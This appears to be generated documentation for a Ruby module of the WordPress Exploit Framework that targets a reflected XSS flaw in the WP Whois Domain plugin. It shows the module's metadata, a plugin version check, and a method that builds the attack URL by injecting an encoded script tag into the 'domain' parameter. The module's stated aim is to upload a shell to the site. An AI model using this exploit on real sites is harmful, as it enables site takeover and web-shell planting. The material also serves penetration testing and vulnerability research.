class Wpxf::Exploit::WpWhoisDomainReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'WP Whois Domain Reflected XSS Shell Upload',
    author: [
      'rastating' # WPXF module
    ],
    references: [
      ['WPVDB', '8683'],
      ['URL', 'https://www.rastating.com/wp-whois-domain-reflected-xss/']
    ],
    date: 'Nov 28 2016'
  )

  register_options([
    StringOption.new(
      name: 'form_path',
      desc: 'The path of the page that contains the WP Whois Domain form',
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb, line 30
def check
  check_plugin_version_from_readme('wp-whois-domain')
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb, line 38
def url_with_xss
  "#{vulnerable_url}?domain=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/wp_whois_domain_reflected_xss_shell_upload.rb, line 34
def vulnerable_url
  normalize_uri(full_uri, datastore['form_path'])
end